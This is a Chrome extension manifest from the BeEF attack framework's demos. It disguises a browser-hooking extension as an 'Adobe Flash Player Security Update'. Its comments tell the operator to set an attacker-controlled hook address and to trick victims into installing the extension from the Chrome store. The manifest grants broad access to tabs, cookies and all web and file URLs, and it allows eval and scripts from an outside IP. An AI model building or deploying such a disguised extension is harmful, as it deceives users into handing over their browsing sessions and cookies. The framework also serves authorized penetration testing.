beef/extensions/demos/flash_update_chrome_extension/manifest.json

{
    // Simple chrome extension, by antisnatchor and Mike Haworth
    // Just loads BeEF into the extension context.
    //
    // 1. You need to set the IP address (better the domain) of the BeEF hook in background.js
    // 2. The BeEF hook address must be == to the CSP allowed domain here below. BeEF must listen on port 443, with TLS enabled.
    //    Only localhost origin is allowed to load scripts from non HTTPS resources. For anything else, you must use HTTPS.
    // 4. You need to upload the extension, as a zip file, to Google Chrome store.
    //    In latest versions of Chrome (>= 21) you can't install an extension from a different location anymore,
    //    so the extension can't be served by BeEF anymore. You need to trick the victim to install
    //    the extension from Google Chrome store.
    //

    "name": "Adobe Flash Player Security Update",
    "manifest_version": 2,
    "version": "11.5.502.149",
    "description": "Updates Adobe Flash Player with latest securty updates",
    "background": {
        "scripts": ["background.js"]
    },
    "content_security_policy": "script-src 'self' 'unsafe-eval' https://192.168.0.2; object-src 'self'",
    "icons": {
        "16": "icon16.png",
        "48": "icon48.png",
        "128": "icon128.png"
    },
    "permissions": [
        "tabs",
        "http://*/*",
        "https://*/*",
        "file://*/*",
        "cookies"
    ]
}